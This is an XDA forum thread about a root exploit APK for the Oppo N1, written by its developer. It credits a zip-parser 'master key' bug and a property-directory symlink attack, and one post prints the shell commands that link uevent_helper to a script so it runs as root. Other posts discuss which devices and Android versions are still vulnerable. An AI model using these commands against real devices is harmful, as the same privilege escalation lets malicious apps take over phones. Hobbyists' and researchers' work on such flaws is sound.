Welcome to XDA

Search to go directly to your device's forum

Register an account

Unlock full posting privileges

Ask a question

No registration required
Post Reply

APK root exploit

OP jcase

23rd November 2013, 07:25 PM   |  #1  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,309
 
3,946 posts
Join Date:Joined: Feb 2010
Donate to Me
More
I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit
Attached Files
File Type: apk Oppown-build3.apk - [Click for QR Code] (368.9 KB, 8714 views)
The Following 14 Users Say Thank You to jcase For This Useful Post: [ View ]
24th November 2013, 01:15 AM   |  #2  
Mr_Bartek's Avatar
Senior Member
Thanks Meter: 399
 
1,190 posts
Join Date:Joined: Jun 2009
Donate to Me
More
Do you have a link to their research or are their findings private?

Regards,
24th November 2013, 01:41 AM   |  #3  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,309
 
3,946 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by Mr_Bartek

Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlnink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
The Following 2 Users Say Thank You to jcase For This Useful Post: [ View ]
24th November 2013, 04:00 AM   |  #4  
Senior Member
Flag Bangalore
Thanks Meter: 109
 
491 posts
Join Date:Joined: Jun 2012
Donate to Me
More
Angry
Quote:
Originally Posted by jcase

I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit

Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.
24th November 2013, 04:08 AM   |  #5  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,309
 
3,946 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by coolrevi

Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.

Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from
24th November 2013, 11:27 AM   |  #6  
Ricky Divjakovski's Avatar
Recognized Contributor
Flag Sydney
Thanks Meter: 5,357
 
3,615 posts
Join Date:Joined: Feb 2013
Donate to Me
More
Quote:
Originally Posted by jcase

Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from

a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!
24th November 2013, 12:40 PM   |  #7  
Quote:
Originally Posted by ricky310711

a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely
24th November 2013, 01:02 PM   |  #8  
Ricky Divjakovski's Avatar
Recognized Contributor
Flag Sydney
Thanks Meter: 5,357
 
3,615 posts
Join Date:Joined: Feb 2013
Donate to Me
More
Quote:
Originally Posted by pulser_g2

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...
24th November 2013, 06:17 PM   |  #9  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 8,309
 
3,946 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by ricky310711

so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...

It depends on if OEMs backported it, depends on which build OEMs used and depends on the bug. Four or five different zip parser bugs with similar results. This one I used was patched in 4.3, but other exist.
The Following User Says Thank You to jcase For This Useful Post: [ View ]
1st January 2014, 03:22 AM   |  #10  
Junior Member
Thanks Meter: 0
 
2 posts
Join Date:Joined: Dec 2006
Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.

Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes